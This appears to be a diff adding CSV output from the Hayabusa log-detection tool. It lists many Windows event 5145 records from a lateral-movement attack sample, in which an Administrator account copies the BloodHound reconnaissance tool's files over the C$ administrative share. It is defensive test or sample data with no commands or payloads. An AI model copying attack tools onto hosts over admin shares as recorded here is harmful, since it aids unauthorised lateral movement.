+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
